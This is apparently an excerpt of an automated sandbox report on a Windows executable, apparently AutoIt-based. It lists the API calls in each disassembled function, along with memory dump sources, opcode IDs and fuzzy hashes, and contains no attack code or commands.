                                                                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                        • String ID:
                                                                                                        • API String ID: 2833360925-0
                                                                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32 ref: 004555C7
                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3691411573-0
                                                                                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                        • EndPath.GDI32(?), ref: 004472D6
                                                                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                        • String ID:
                                                                                                        • API String ID: 372113273-0
                                                                                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Release
                                                                                                        • String ID:
                                                                                                        • API String ID: 1035833867-0
                                                                                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                        APIs
                                                                                                        • __getptd.LIBCMT ref: 0041708E
                                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                        • __lock.LIBCMT ref: 004170BE
                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                        • _free.LIBCMT ref: 004170EE
                                                                                                        • InterlockedIncrement.KERNEL32(033C2CE0), ref: 00417106
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3470314060-0
                                                                                                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                        APIs
                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3495660284-0
                                                                                                        APIs
                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                        Similarity
                                                                                                        • API ID: Virtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4278518827-0
                                                                                                        APIs
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                        • String ID:
                                                                                                        • API String ID: 442100245-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 621800784-4108050209
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 3884216118-234962358
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                        • String ID: AU3_GetPluginDetails$ou
                                                                                                        • API String ID: 145871493-528704710
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                        • IsMenu.USER32(?), ref: 0044854D
                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$_memmove_wcslen
                                                                                                        • String ID: ComboBox$ListBox
                                                                                                        • API String ID: 1589278365-1403004172
                                                                                                        • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                        • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Handle
                                                                                                        • String ID: nul
                                                                                                        • API String ID: 2519475695-2873401336
                                                                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Handle
                                                                                                        • String ID: nul
                                                                                                        • API String ID: 2519475695-2873401336
                                                                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: SysAnimate32
                                                                                                        • API String ID: 0-1011021900
                                                                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                        • GetFocus.USER32 ref: 0046157B
                                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                        • __swprintf.LIBCMT ref: 00461608
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                        • String ID: %s%d
                                                                                                        • API String ID: 2645982514-1110647743
                                                                                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                        Similarity
                                                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 15295421-0
                                                                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                        Similarity
                                                                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3539004672-0
                                                                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                        APIs
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 327565842-0
                                                                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                        APIs
                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                        • String ID:
                                                                                                        • API String ID: 2832842796-0
                                                                                                        • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                        • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                        APIs
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
